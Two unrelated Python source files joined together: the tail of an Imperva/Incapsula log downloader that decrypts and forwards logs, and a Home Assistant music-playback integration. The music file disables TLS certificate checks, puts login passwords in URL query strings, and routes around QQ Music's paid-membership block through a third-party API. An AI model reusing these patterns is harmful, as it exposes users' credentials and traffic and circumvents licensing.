decrypted_file = decrypted_file.decode('utf-8')
if self.config.SYSLOG_ENABLE == 'YES':
syslogger = logging.getLogger("syslog")
syslogger.setLevel(logging.INFO)
if self.config.SYSLOG_PROTO == 'TCP':
self.logger.info('Syslog enabled, using TCP')
syslog = logging.handlers.SysLogHandler(address=(self.config.SYSLOG_ADDRESS, int(self.config.SYSLOG_PORT)), socktype=socket.SOCK_STREAM)
else:
self.logger.info('Syslog enabled, using UDP')
syslog = logging.handlers.SysLogHandler(address=(self.config.SYSLOG_ADDRESS, int(self.config.SYSLOG_PORT)))
syslogger.addHandler(syslog)
for msg in decrypted_file.splitlines():
if msg != '':
try:
syslogger.info(msg)
except:
self.logger.error('Error sending log file to syslog server %s on port %s via protocol %s', self.config.SYSLOG_ADDRESS, self.config.SYSLOG_PORT, self.config.SYSLOG_PROTO)
if self.config.SAVE_LOCALLY == "YES":
with open(self.config.PROCESS_DIR + filename, "a+") as local_file:
local_file.writelines(decrypted_file)
"""
Decrypt a file content
"""
def decrypt_file(self, file_content, filename):
# each log file is built from a header section and a content section, the two are divided by a |==| mark
file_split_content = file_content.split(b"|==|\n")
# get the header section content
file_header_content = file_split_content[0].decode('utf-8')
# get the log section content
file_log_content = file_split_content[1]
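# Illustrative file layout, inferred from the fields parsed below (exact header
# field order is an assumption):
#   checksum:<md5 hex digest of the uncompressed log content>
#   key:<base64-encoded, RSA-encrypted AES key> (absent when the file is unencrypted)
#   publicKeyId:<id of the matching key directory under <config_path>/keys>
#   |==|
#   <zlib-compressed (and, when encrypted, AES-CBC-encrypted) log records>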
# if the file is not encrypted, its header will not contain a "key:" field
file_encryption_key = file_header_content.find("key:")
if file_encryption_key == -1:
# uncompress the log content
uncompressed_and_decrypted_file_content = zlib.decompressobj().decompress(file_log_content)
# if the file is encrypted
else:
content_encrypted_sym_key = file_header_content.split("key:")[1].splitlines()[0]
# we expect to have a 'keys' folder that will have the stored private keys
self.logger.warning('Keys Dir: %s', os.path.join(self.config_path, "keys"))
if not os.path.exists(os.path.join(self.config_path, "keys")):
self.logger.error("No encryption keys directory was found and file %s is encrypted", filename)
raise Exception("No encryption keys directory was found")
# get the public key id from the log file header
public_key_id = file_header_content.split("publicKeyId:")[1].splitlines()[0]
# get the public key directory in the filesystem - each time we upload a new key this id is incremented
public_key_directory = os.path.join(os.path.join(self.config_path, "keys"), public_key_id)
# if the key directory does not exists
if not os.path.exists(public_key_directory):
self.logger.error("Failed to find a proper certificate for : %s who has the publicKeyId of %s", filename, public_key_id)
raise Exception("Failed to find a proper certificate")
# get the checksum
checksum = file_header_content.split("checksum:")[1].splitlines()[0]
# get the private key
with open(os.path.join(public_key_directory, "Private.key"), "r") as key_file:
private_key = bytes(key_file.read(), 'utf-8')
try:
rsa_private_key = M2Crypto.RSA.load_key_string(private_key)
content_decrypted_sym_key = rsa_private_key.private_decrypt(base64.b64decode(bytes(content_encrypted_sym_key, 'utf-8')), M2Crypto.RSA.pkcs1_padding)
uncompressed_and_decrypted_file_content = zlib.decompressobj().decompress(AES.new(base64.b64decode(bytearray(content_decrypted_sym_key)), AES.MODE_CBC, 16 * b"\x00").decrypt(file_log_content))  # the AES IV must be bytes
# we check the content validity by checking the checksum
content_is_valid = self.validate_checksum(checksum, uncompressed_and_decrypted_file_content)
if not content_is_valid:
self.logger.error("Checksum verification failed for file %s", filename)
raise Exception("Checksum verification failed")
except Exception as e:
self.logger.error("Error while trying to decrypt the file %s: %s", filename, e)
raise Exception("Error while trying to decrypt the file" + filename)
return uncompressed_and_decrypted_file_content
"""
Downloads a log file
"""
def download_log_file(self, filename):
# get the file name
filename = str(filename.rstrip("\r\n"))
try:
# download the file
file_content = self.file_downloader.request_file_content(self.config.BASE_URL + filename)
# if we received a valid file content
if file_content != "":
return "OK", file_content
# if the file was not found
else:
return "NOT_FOUND", file_content
except Exception:
self.logger.error("Error while trying to download file")
return "ERROR"
"""
Validates a checksum
"""
@staticmethod
def validate_checksum(checksum, uncompressed_and_decrypted_file_content):
m = hashlib.md5()
m.update(uncompressed_and_decrypted_file_content)
return m.hexdigest() == checksum
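# Minimal usage sketch (hypothetical content, for illustration only):
# LogsDownloader.validate_checksum(hashlib.md5(b"log line\n").hexdigest(), b"log line\n")  # -> True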
"""
Handle a case of process termination
"""
def set_signal_handling(self, sig, frame):
if sig == signal.SIGTERM:
self.running = False
self.logger.info("Got a termination signal, will now shutdown and exit gracefully")
"""
Extracts the numeric counter from a log file name
"""
def get_counter_from_file_name(self, file_name):
curr_log_file_name_arr = file_name.split("_")
return int(curr_log_file_name_arr[1].rstrip(".log"))
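# e.g. get_counter_from_file_name("15_1234.log") -> 1234 (illustrative name; file names
# follow the <id>_<counter>.log pattern enforced by LogsFileIndex.validate_log_file_format)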
"""
****************************************************************
Helper Classes
****************************************************************
"""
"""
LastFileId - A class for managing the last known successfully downloaded log file
"""
class LastFileId:
def __init__(self, config_path):
self.config_path = config_path
"""
Gets the last known successfully downloaded log file id
"""
def get_last_log_id(self):
# gets the LastKnownDownloadedFileId file
index_file_path = os.path.join(self.config_path, "LastKnownDownloadedFileId.txt")
# if the file exists - get the log file id from it
if os.path.exists(index_file_path):
with open(index_file_path, "r+") as index_file:
return index_file.read()
# return an empty string if no file exists
return ''
"""
Update the last known successfully downloaded log file id
"""
def update_last_log_id(self, last_id):
# gets the LastKnownDownloadedFileId file
index_file_path = os.path.join(self.config_path, "LastKnownDownloadedFileId.txt")
with open(index_file_path, "w") as index_file:
# update the id
index_file.write(last_id)
"""
Remove the LastKnownDownloadedFileId.txt file. Used to skip missing files.
"""
def remove_last_log_id(self):
index_file_path = os.path.join(self.config_path, "LastKnownDownloadedFileId.txt")
if os.path.exists(index_file_path):
os.remove(index_file_path)
"""
Gets the next log file name that we should download
"""
def get_next_file_name(self, skip_files=0):
# get the current stored last known successfully downloaded log file
curr_log_file_name_arr = self.get_last_log_id().split("_")
# get the current id
curr_log_file_id = int(curr_log_file_name_arr[1].rstrip(".log")) + 1 + skip_files
# build the next log file name
new_log_file_id = curr_log_file_name_arr[0] + "_" + str(curr_log_file_id) + ".log"
return new_log_file_id
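# e.g. if the stored last id is "15_1234.log" (illustrative), get_next_file_name()
# returns "15_1235.log" and get_next_file_name(skip_files=1) returns "15_1236.log"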
"""
Increment the last known successfully downloaded log file id
"""
def move_to_next_file(self):
self.update_last_log_id(self.get_next_file_name())
"""
LogsFileIndex - A class for managing the logs files index file
"""
class LogsFileIndex:
def __init__(self, config, logger, downloader):
self.config = config
self.content = None
self.hash_content = None
self.logger = logger
self.file_downloader = downloader
"""
Gets the indexed log files
"""
def indexed_logs(self):
return self.content
"""
Downloads a logs file index file
"""
def download(self):
self.logger.info("Downloading logs index file...")
# try to get the logs.index file
file_content = self.file_downloader.request_file_content(self.config.BASE_URL + "logs.index")
# if we got the file content
if file_content != "":
content = file_content.decode("utf-8")
# validate the file format
if LogsFileIndex.validate_logs_index_file_format(content):
self.content = content.splitlines()
self.hash_content = set(self.content)
else:
self.logger.error("log.index, Pattern Validation Failed")
raise Exception
else:
raise Exception('Index file does not yet exist, please allow time for files to be generated.')
"""
Validates the format of the log file names inside the logs index file
"""
@staticmethod
def validate_logs_index_file_format(content):
file_rex = re.compile("(\d+_\d+\.log\n)+")
if file_rex.match(content):
return True
return False
"""
Validates a log file name format
"""
@staticmethod
def validate_log_file_format(content):
file_rex = re.compile("(\d+_\d+\.log)")
if file_rex.match(content):
return True
return False
"""
Config - A class for reading the configuration file
"""
class Config:
def __init__(self, config_path, logger):
self.config_path = config_path
self.logger = logger
"""
Reads the configuration file
"""
def read(self):
config_file = os.path.join(self.config_path, "Settings.Config")
if os.path.exists(config_file):
config_parser = configparser.ConfigParser()
config_parser.read(config_file)
config = Config(self.config_path, self.logger)
# Check for environment variables first, then load config values. Backwards compatibility with non-docker deployments
config.API_ID = os.environ.get('IMPERVA_API_ID', config_parser.get("SETTINGS", "APIID"))
config.API_KEY = os.environ.get('IMPERVA_API_KEY', config_parser.get("SETTINGS", "APIKEY"))
config.PROCESS_DIR = os.environ.get('IMPERVA_LOG_DIRECTORY', os.path.join(config_parser.get("SETTINGS", "PROCESS_DIR"), ""))
config.BASE_URL = os.environ.get('IMPERVA_API_URL', os.path.join(config_parser.get("SETTINGS", "BASEURL"), ""))
config.SAVE_LOCALLY = os.environ.get('IMPERVA_SAVE_LOCALLY', config_parser.get("SETTINGS", "SAVE_LOCALLY"))
config.USE_PROXY = os.environ.get('IMPERVA_USE_PROXY', config_parser.get("SETTINGS", "USEPROXY"))
config.PROXY_SERVER = os.environ.get('IMPERVA_PROXY_SERVER', config_parser.get("SETTINGS", "PROXYSERVER"))
config.SYSLOG_ENABLE = os.environ.get('IMPERVA_SYSLOG_ENABLE', config_parser.get('SETTINGS', 'SYSLOG_ENABLE'))
config.SYSLOG_ADDRESS = os.environ.get('IMPERVA_SYSLOG_ADDRESS', config_parser.get('SETTINGS', 'SYSLOG_ADDRESS'))
config.SYSLOG_PORT = os.environ.get('IMPERVA_SYSLOG_PORT', config_parser.get('SETTINGS', 'SYSLOG_PORT'))
config.SYSLOG_PROTO = os.environ.get('IMPERVA_SYSLOG_PROTO', config_parser.get('SETTINGS','SYSLOG_PROTO'))
config.USE_CUSTOM_CA_FILE = os.environ.get('IMPERVA_USE_CUSTOM_CA_FILE', config_parser.get('SETTINGS', 'USE_CUSTOM_CA_FILE'))
config.CUSTOM_CA_FILE = os.environ.get('IMPERVA_CUSTOM_CA_FILE', config_parser.get('SETTINGS', 'CUSTOM_CA_FILE'))
return config
else:
self.logger.error("Could Not find configuration file %s", config_file)
raise Exception("Could Not find configuration file")
"""
FileDownloader - A class for downloading files
"""
class FileDownloader:
def __init__(self, config, logger):
self.config = config
self.logger = logger
"""
A method for getting a destination URL file content
"""
def request_file_content(self, url, timeout=20):
# default value
response_content = ""
#https://github.com/imperva/incapsula-logs-downloader/pull/7
if self.config.USE_PROXY == "YES" and self.config.USE_CUSTOM_CA_FILE == "YES":
self.logger.info("Using proxy %s" % self.config.PROXY_SERVER)
https = urllib3.ProxyManager(self.config.PROXY_SERVER, ca_certs=self.config.CUSTOM_CA_FILE, cert_reqs='CERT_REQUIRED', timeout=timeout)
elif self.config.USE_PROXY == "YES" and self.config.USE_CUSTOM_CA_FILE == "NO":
self.logger.info("Using proxy %s" % self.config.PROXY_SERVER)
https = urllib3.ProxyManager(self.config.PROXY_SERVER, cert_reqs='CERT_REQUIRED', timeout=timeout)
elif self.config.USE_PROXY == "NO" and self.config.USE_CUSTOM_CA_FILE == "YES":
https = urllib3.PoolManager(ca_certs=self.config.CUSTOM_CA_FILE, cert_reqs='CERT_REQUIRED', timeout=timeout)
else: # no proxy and no custom CA file
https = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', timeout=timeout)
try:
#Download the file
auth_header = urllib3.make_headers(basic_auth='%s:%s' % (self.config.API_ID, self.config.API_KEY))
response = https.request('GET', url, headers=auth_header)
# if we get a 200 OK response
if response.status == 200:
self.logger.info("Successfully downloaded file from URL %s" % url)
# read the response content
response_content = response.data
# if we get another response code
elif response.status == 404:
self.logger.warning("Could not find file %s. Response code is %s", url, response.status)
return response_content
elif response.status == 401:
self.logger.error("Authorization error - Failed to download file %s. Response code is %s", url, response.status)
raise Exception("Authorization error")
elif response.status == 429:
self.logger.error("Rate limit exceeded - Failed to download file %s. Response code is %s", url, response.status)
raise Exception("Rate limit error")
else:
self.logger.error("Failed to download file %s. Response code is %s. Data is %s", url, response.status, response.data)
# close the response
response.close()
# return the content string
return response_content
except urllib3.exceptions.HTTPError as e:
print('Request failed:', e)
self.logger.error("An error has occur while making a open connection to %s. %s", url, str(e.reason))
raise Exception("Connection error")
# unexpected exception occurred
except Exception:
self.logger.error("An error has occur while making a open connection to %s. %s", url, traceback.format_exc())
raise Exception("Connection error")
if __name__ == "__main__":
# default paths
path_to_config_folder = "/etc/incapsula/logs/config"
path_to_system_logs_folder = "/var/log/incapsula/logsDownloader/"
# default log level
system_logs_level = "INFO"
# read arguments
try:
opts, args = getopt.getopt(sys.argv[1:], 'c:l:v:h', ['configpath=', 'logpath=', 'loglevel=', 'help'])
except getopt.GetoptError:
print("Error starting Logs Downloader. The following arguments should be provided:" \
" \n '-c' - path to the config folder" \
" \n '-l' - path to the system logs folder" \
" \n '-v' - LogsDownloader system logs level" \
" \n Or no arguments at all in order to use default paths")
sys.exit(2)
for opt, arg in opts:
if opt in ('-h', '--help'):
print('LogsDownloader.py -c <path_to_config_folder> -l <path_to_system_logs_folder> -v <system_logs_level>')
sys.exit(2)
elif opt in ('-c', '--configpath'):
path_to_config_folder = arg
elif opt in ('-l', '--logpath'):
path_to_system_logs_folder = arg
elif opt in ('-v', '--loglevel'):
system_logs_level = arg.upper()
if system_logs_level not in ["DEBUG", "INFO", "ERROR"]:
sys.exit("Provided system logs level is not supported. Supported levels are DEBUG, INFO and ERROR")
# init the LogsDownloader
logsDownloader = LogsDownloader(path_to_config_folder, path_to_system_logs_folder, system_logs_level)
# set a handler for process termination
signal.signal(signal.SIGTERM, logsDownloader.set_signal_handling)
try:
# start a dedicated thread that will run the LogsDownloader logs fetching logic
process_thread = threading.Thread(target=logsDownloader.get_log_files, name="process_thread")
# start the thread
process_thread.start()
while logsDownloader.running:
time.sleep(1)
process_thread.join(1)
except Exception:
sys.exit("Error starting Logs Downloader - %s" % traceback.format_exc())
|
api_music.py | import aiohttp, json, re, os, uuid, math, urllib.parse, urllib.request, threading
import http.cookiejar as HC
from .shaonianzhentan import fetch_info
from homeassistant.helpers.network import get_url
# Global request headers
HEADERS = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'}
# Simulate a macOS environment
COOKIES = {'os': 'osx'}
# Leting Toutiao (news) configuration
UID = str(uuid.uuid4()).replace('-','')
class ApiMusic():
def __init__(self, media, config):
self.hass = media._hass
self.media = media
# NetEase Cloud Music API base URL
self.api_url = config.get("api_url", '').strip('/')
self.qq_api_url = config.get('qq_api_url', '').strip('/')
self.xmly_api_url = config.get('xmly_api_url', '').strip('/')
# NetEase Cloud Music user ID
self.uid = str(config.get("uid", ''))
# Username and password
self.user = str(config.get("user", ''))
self.password = str(config.get("password", ''))
async def login(self):
# Log in if a username and password are configured
if self.user != '' and self.password != '':
self.log('Login', 'Starting login')
# Check whether the account is an email address
if '@' in self.user:
# Email login
res = await self.get('/login?email=' + self.user + '&password=' + self.password)
else:
# Mobile number login
res = await self.get('/login/cellphone?phone=' + self.user + '&password=' + self.password)
# Login succeeded
if res is not None and res['code'] == 200:
self.uid = str(res['account']['id'])
self.log('Login succeeded')
else:
self.media.notify("NetEase Cloud Music login failed. Check that the account and password are correct; if they are, check that the API service is running.", "error")
self.log('Login failed', res)
def log(self, name, value = ''):
self.media.log('[ApiMusic API] %s: %s', name, value)
async def get(self, url):
link = self.api_url + url
# Show the URL unless this is a login request (protects the credentials)
if '/login' not in url:
print(link)
result = None
try:
global COOKIES
jar = aiohttp.CookieJar(unsafe=True)
connector = aiohttp.TCPConnector(verify_ssl=False)
async with aiohttp.ClientSession(headers=HEADERS, cookies=COOKIES, cookie_jar=jar, connector=connector) as session:
async with session.get(link) as resp:
# If this is a login request, persist the login state
if '/login' in url:
_dict = {}
cookies = session.cookie_jar.filter_cookies(self.api_url)
for key, cookie in cookies.items():
_dict[key] = cookie.value
# print(key)
# print(cookie.value)
# Update the global cookies
COOKIES = _dict
result = await resp.json()
except Exception as e:
self.media.notify('The API raised an exception; check that the music API service is running properly', "error")
self.log('[API exception] ' + link, e)
return result
async def proxy_get(self, url):
print(url)
result = None
try:
headers = {'Referer': url}
headers.update(HEADERS)
connector = aiohttp.TCPConnector(verify_ssl=False)
async with aiohttp.ClientSession(headers=headers, connector=connector) as session:
async with session.get(url) as resp:
# Ximalaya returns plain text
if 'https://mobile.ximalaya.com/mobile/' in url:
result = json.loads(await resp.text())
else:
result = await resp.json()
except Exception as e:
self.log('[API exception] ' + url, e)
return result
# QQ Music
async def qq_get(self, url):
if self.qq_api_url != '':
res = await self.proxy_get(self.qq_api_url + url)
if res is not None and res['response']["code"] == 0:
return res['response']
###################### Get music playback URLs ######################
async def get_http_code(self, url):
connector = aiohttp.TCPConnector(verify_ssl=False)
async with aiohttp.ClientSession(connector=connector) as session:
async with session.get(url) as response:
return response.status
# Get a song URL
async def get_song_url(self, id):
obj = await self.get("/song/url?id=" + str(id))
return obj['data'][0]['url']
# Get the QQ Music song URL
async def get_qq_song_url(self, id):
res = await self.qq_get("/getMusicVKey?songmid=" + str(id))
if res is not None and len(res['playLists']) > 0:
url = res['playLists'][0]
http_code = await self.get_http_code(url)
# a 403 means only paying QQ Music "Green Diamond" members may listen to this
# song directly, so fall back to this fellow's open API instead
if http_code == 403:
vip_url = 'https://api.qq.jsososo.com/song/url?id=' + str(id)
print(f"Falling back to the open API: {vip_url}")
res = await self.proxy_get(vip_url)
if res is not None and res.get('data'):
return res['data']
self.media.notify("😂 Only paying QQ Music Green Diamond members can listen to this song", "error")
return None
return url
# Get the URL after redirection
async def get_redirect_url(self, url):
# Request the page
res = await fetch_info(url)
result_url = res['url']
if result_url == 'https://music.163.com/404':
return None
return result_url
# Search Migu Music; this lets us play Jay Chou's songs
async def migu_search(self, songName, singerName):
try:
# If the name contains special characters, search by the song name alone
searchObj = re.search(r'\(|(|:|:《', songName, re.M|re.I)
if searchObj:
keywords = songName
else:
keywords = songName + ' - '+ singerName
res = await self.proxy_get("http://m.music.migu.cn/migu/remoting/scr_search_tag?rows=10&type=2&keyword=" + urllib.parse.quote(keywords) + "&pgc=1")
if 'musics' in res and len(res['musics']) > 0 and (songName in res['musics'][0]['songName'] or searchObj):
return res['musics'][0]['mp3']
except Exception as e:
print("在咪咕搜索时出现错误:", e)
return None
###################### Get music playback URLs ######################
###################### Search music ######################
async def search_migu(self, name, rows = 10):
res = await self.proxy_get("http://m.music.migu.cn/migu/remoting/scr_search_tag?rows=" + str(rows)+ "&type=2&keyword=" + urllib.parse.quote(name) + "&pgc=1")
if res is not None:
songs = res['musics']
if res['pgt'] > 0:
_newlist = map(lambda item: {
"search_source": "咪咕音乐",
"id": int(item['id']),
"name": item['songName'],
"album": item['albumName'],
"image": item['cover'] != 'null' and item['cover'] or 'https://m.music.migu.cn/migu/fs/media/p/149/163/5129/image/20171120/1332871.jpg',
"duration": 0,
"url": item['mp3'],
"song": item['songName'],
"singer": item['singerName']
}, songs)
return list(_newlist)
# Music search
async def search_music(self, name):
_list = []
# Search NetEase Cloud Music
obj = await self.get('/search?keywords='+ name)
if obj['code'] == 200:
songs = obj['result']['songs']
if len(songs) > 0:
_newlist = map(lambda item: {
"search_source": "网易云音乐",
"id": int(item['id']),
"name": item['name'],
"album": item['album']['name'],
"image": item['album']['artist']['img1v1Url']+"?param=300y300",
"duration": int(item['duration']) / 1000,
"url": "https://music.163.com/song/media/outer/url?id=" + str(item['id']) + ".mp3",
"song": item['name'],
"singer": len(item['artists']) > 0 and item['artists'][0]['name'] or '未知'
}, songs)
_list.extend(list(_newlist))
# Search QQ Music
res = await self.qq_get('/getSmartbox?key=' + name)
if res is not None:
songs = res['data']['song']
if songs['count'] > 0:
_newlist = map(lambda item: {
"search_source": "QQ音乐",
"id": int(item['id']),
"mid": item['mid'],
"name": item['name'],
"album": "QQ音乐",
"image": "http://p3.music.126.net/3TTjFNIrtcUzoMlB1D1fDA==/109951164969055590.jpg?param=300y300",
"duration": 0,
"type": "qq",
"song": item['name'],
"singer": item['singer']
}, songs['itemlist'])
_list.extend(list(_newlist))
# Search Migu Music
migu_list = await self.search_migu(name)
if migu_list is not None:
_list.extend(migu_list)
return _list
async def search_ximalaya(self, name):
_newlist = []
url = f'https://m.ximalaya.com/m-revision/page/search?kw={name}&core=all&page=1&rows=20'
obj = await self.proxy_get(url)
if obj['ret'] == 0:
artists = obj['data']['albumViews']['albums']
_newlist = list(map(lambda item: {
"id": item['albumInfo']['id'],
"name": item['albumInfo']['title'],
"cover": item['albumInfo'].get('cover_path', 'https://imagev2.xmcdn.com/group79/M02/77/6C/wKgPEF6masWTCICAAAA7qPQDtNY545.jpg!strip=1&quality=7&magick=webp&op_type=5&upload_type=cover&name=web_large&device_type=ios'),
"intro": item['albumInfo']['intro'],
"creator": item['albumInfo']['nickname']
}, artists))
return _newlist
async def search_djradio(self, name):
_newlist = []
obj = await self.get('/search?keywords='+ name +'&type=1009')
if obj['code'] == 200:
artists = obj['result']['djRadios']
_newlist = list(map(lambda item: {
"id": item['id'],
"name": item['name'],
"cover": item['picUrl'],
"intro": item['dj']['signature'],
"creator": item['dj']['nickname']
}, artists))
return _newlist
async def search_playlist(self, name):
_newlist = []
obj = await self.get('/search?keywords='+ name +'&type=1000')
if obj['code'] == 200:
artists = obj['result']['playlists']
_newlist = list(map(lambda item: {
"id": item['id'],
"name": item['name'],
"cover": item['coverImgUrl'],
"intro": item['description'],
"creator": item['creator']['nickname']
}, artists))
return _newlist
###################### Get music lists ######################
# Get a NetEase playlist
async def music_playlist(self, id):
obj = await self.get('/playlist/detail?id=' + str(id))
if obj['code'] == 200:
trackIds = obj['playlist']['trackIds']
_trackIds = map(lambda item: str(item['id']), trackIds)
_obj = await self.get('/song/detail?ids=' + ','.join(_trackIds))
_list = _obj['songs']
_newlist = map(lambda item: {
"id": int(item['id']),
"name": item['name'],
"album": item['al']['name'],
"image": item['al']['picUrl'],
"duration": int(item['dt']) / 1000,
"url": "https://music.163.com/song/media/outer/url?id=" + str(item['id']) + ".mp3",
"song": item['name'],
"singer": len(item['ar']) > 0 and item['ar'][0]['name'] or '未知'
}, _list)
return {
'name': obj['playlist']['name'],
'list': list(_newlist)
}
else:
return None
# Get a NetEase DJ radio program list
async def djradio_playlist(self, id, offset, size):
obj = await self.get('/dj/program?rid='+str(id)+'&limit=50&offset='+str(offset * size))
if obj['code'] == 200:
_list = obj['programs']
_totalCount = obj['count']
_newlist = map(lambda item: {
"id": int(item['mainSong']['id']),
"name": item['name'],
"album": item['dj']['brand'],
"image": item['coverUrl'],
"duration": int(item['mainSong']['duration']) / 1000,
"song": item['name'],
"load":{
'id': id,
'type': 'djradio',
'index': offset + 1,
'total': _totalCount
},
"type": "djradio",
"singer": item['dj']['nickname']
}, _list)
return list(_newlist)
else:
return []
# Ximalaya playlist
async def ximalaya_playlist(self, id, index, size=50):
url = 'https://mobile.ximalaya.com/mobile/v1/album/track?albumId=' + str(id) + '&device=android&isAsc=true&pageId=' + str(index) + '&pageSize=' + str(size) +'&statEvent=pageview%2Falbum%40203355&statModule=%E6%9C%80%E5%A4%9A%E6%94%B6%E8%97%8F%E6%A6%9C&statPage=ranklist%40%E6%9C%80%E5%A4%9A%E6%94%B6%E8%97%8F%E6%A6%9C&statPosition=8'
obj = await self.proxy_get(url)
if obj['ret'] == 0:
_list = obj['data']['list']
_totalCount = obj['data']['totalCount']
if len(_list) > 0:
# Get the album title
url = 'http://mobile.ximalaya.com/v1/track/baseInfo?device=android&trackId='+str(_list[0]['trackId'])
_obj = await self.proxy_get(url)
# Format the list
_newlist = map(lambda item: {
"id": item['trackId'],
"name": item['title'],
"album": _obj['albumTitle'],
"image": item['coverLarge'],
"duration": item['duration'],
"song": item['title'],
"load":{
'id': id,
'type': 'ximalaya',
'index': index,
'total': _totalCount
},
"type": "xmly",
"url": item['playUrl64'],
"singer": item['nickname']
}, _list)
return list(_newlist)
return []
# Play an album
async def play_ximalaya(self, name, number=1):
hass = self.hass
url = 'https://m.ximalaya.com/m-revision/page/search?kw=' + name + '&core=all&page=1&rows=5'
obj = await self.proxy_get(url)
if obj['ret'] == 0:
result = obj['data']['albumViews']
# print(result)
if result['total'] > 0:
albumInfo = result['albums'][0]['albumInfo']
id = albumInfo['id']
print('Got album ID: ' + str(id))
# Prefer locally cached data
if number == -1:
# Read the local cache
res = self.media.api_config.get_cache_playlist('ximalaya', id)
if res is not None:
await self.media.play_media('music_playlist', {
'index': res['index'],
'list': res['playlist']
})
return None
number = 1
_newlist = await self.ximalaya_playlist(id, math.ceil(number / 50), 50)
index = number % 50 - 1
if index < 0:
index = 49
# Call the service to start playback
if len(_newlist) > 0:
await self.media.play_media('music_playlist', {
'index': index,
'list': _newlist
})
return None
# Get the VIP audio URL
async def get_ximalaya_vip_audio_url(self, id):
if self.xmly_api_url != '':
obj = await self.proxy_get(self.xmly_api_url + "/?id=" + str(id))
if obj is not None and obj['code'] == 0:
return obj['data']
###################### Get music lists ######################
###################### Play music lists ######################
# Play a DJ radio program
async def play_dj_hotsong(self, name):
hass = self.hass
obj = await self.get('/search?keywords='+ name +'&type=1009')
if obj['code'] == 200:
artists = obj['result']['djRadios']
if len(artists) > 0:
singerId = artists[0]['id']
_newlist = await self.djradio_playlist(singerId, 0, 50)
if len(_newlist) > 0:
# Call the service to start playback
await self.media.play_media('music_playlist', list(_newlist))
else:
return None
# Play a singer's top songs
async def play_singer_hotsong(self, name):
# Special-case Jay Chou
if name == '周杰伦':
migu_list = await self.search_migu(name, 100)
await self.media.play_media('music_playlist', migu_list)
return None
hass = self.hass
obj = await self.get('/search?keywords='+ name +'&type=100')
if obj['code'] == 200:
artists = obj['result']['artists']
if len(artists) > 0:
singerId = artists[0]['id']
# Get the top songs
hot_obj = await self.get('/artists/top/song?id='+ str(singerId))
if hot_obj['code'] == 200:
_list = hot_obj['hotSongs']
_newlist = map(lambda item: {
"id": int(item['id']),
"name": item['name'],
"album": item['al']['name'],
"image": ('picUrl' in item['al']) and item['al']['picUrl'] or hot_obj['artist']['picUrl'],
"duration": int(item['dt']) / 1000,
"url": "https://music.163.com/song/media/outer/url?id=" + str(item['id']) + ".mp3",
"song": item['name'],
"singer": len(item['ar']) > 0 and item['ar'][0]['name'] or '未知'
}, _list)
# Call the service to start playback
await self.media.play_media('music_playlist', list(_newlist))
else:
return None
# Play music
async def play_song(self, name):
_list = await self.search_music(name)
# Call the service to start playback
if len(_list) > 0:
await self.media.play_media('music_playlist', _list)
# Play a playlist
async def play_list_hotsong(self, name):
obj = await self.get('/search?keywords='+ name +'&type=1000')
if obj['code'] == 200:
artists = obj['result']['playlists']
if len(artists) > 0:
singerId = artists[0]['id']
obj = await self.music_playlist(singerId)
if obj != None and len(obj['list']) > 0:
_newlist = obj['list']
# Call the service to start playback
await self.media.play_media('music_playlist', _newlist)
else:
return None
###################### Play music lists ######################
###################### Play news ######################
# Fetch the news
async def _get_news(self, session, leting_headers, catalog_id):
async with session.get('https://app.leting.io/app/url/channel?catalog_id=' + catalog_id + '&size=20&distinct=1&v=v8&channel=xiaomi', headers=leting_headers) as res:
r = await res.json()
_list = r['data']['data']
_newlist = map(lambda item: {
"id": item['sid'],
"name": item['title'],
"album": item['catalog_name'],
"image": item['source_icon'],
"duration": item['duration'],
"url": item['audio'],
"song": item['title'],
"singer": item['source']
}, _list)
return list(_newlist)
async def play_news(self, name):
hass = self.hass
leting_headers = {"uid":UID, "logid": UID, "token": ''}
connector = aiohttp.TCPConnector(verify_ssl=False)
async with aiohttp.ClientSession(connector=connector) as session:
async with session.get('https://app.leting.io/app/auth?uid=' + UID \
+ '&appid=a435325b8662a4098f615a7d067fe7b8&ts=1628297581496&sign=4149682cf40c2bf2efcec8155c48b627&v=v9&channel=huawei', headers=leting_headers) as res:
r = await res.json()
# print(r)
leting_headers['token'] = r['data']['token']
_newlist = []
# Hot topics
_list = await self._get_news(session, leting_headers, 'f3f5a6d2-5557-4555-be8e-1da281f97c22')
if _list is not None:
_newlist.extend(_list)
# Society
_list = await self._get_news(session, leting_headers, 'd8e89746-1e66-47ad-8998-1a41ada3beee')
if _list is not None:
_newlist.extend(_list)
# International
_list = await self._get_news(session, leting_headers, '4905d954-5a85-494a-bd8c-7bc3e1563299')
if _list is not None:
_newlist.extend(_list)
# Domestic
_list = await self._get_news(session, leting_headers, 'fc583bff-e803-44b6-873a-50743ce7a1e9')
if _list is not None:
_newlist.extend(_list)
# Technology
_list = await self._get_news(session, leting_headers, 'f5cff467-2d78-4656-9b72-8e064c373874')
if _list is not None:
_newlist.extend(_list)
'''
Hot topics: f3f5a6d2-5557-4555-be8e-1da281f97c22
Society: d8e89746-1e66-47ad-8998-1a41ada3beee
International: 4905d954-5a85-494a-bd8c-7bc3e1563299
Domestic: fc583bff-e803-44b6-873a-50743ce7a1e9
Sports: c7467c00-463d-4c93-b999-7bbfc86ec2d4
Entertainment: 75564ed6-7b68-4922-b65b-859ea552422c
Finance: c6bc8af2-e1cc-4877-ac26-bac1e15e0aa9
Technology: f5cff467-2d78-4656-9b72-8e064c373874
Military: ba89c581-7b16-4d25-a7ce-847a04bc9d91
Lifestyle: 40f31d9d-8af8-4b28-a773-2e8837924e2e
Education: 0dee077c-4956-41d3-878f-f2ab264dc379
Automotive: 5c930af2-5c8a-4a12-9561-82c5e1c41e48
Culture: f463180f-7a49-415e-b884-c6832ba876f0
Travel: 8cae0497-4878-4de9-b3fe-30518e2b6a9f
Beijing: 29d6168ed172c09fc81d2d71d4ec0686
'''
# Call the service to start playback
await self.media.play_media('music_playlist', _newlist)
###################### Play news ######################
###################### Play FM radio ######################
async def play_fm(self, name):
hass = self.hass
connector = aiohttp.TCPConnector(verify_ssl=False)
async with aiohttp.ClientSession(connector=connector) as session:
async with session.get('https://search.qingting.fm/v3/search?categoryid=0&k=' + name + '&page=1&pagesize=15&include=all') as res:
r = await res.json()
docs = r['data']['data']['docs']
if isinstance(docs, list):
# Keep only live channels
filter_list = list(filter(lambda item: item['type'] == 'channel_live', docs))
if len(filter_list) == 0:
return None
# print(filter_list)
# Normalize the format
_newlist = map(lambda item: {
"id": item['id'],
"name": item['title'],
"album": item['category_name'],
"image": item['cover'],
"duration": 0,
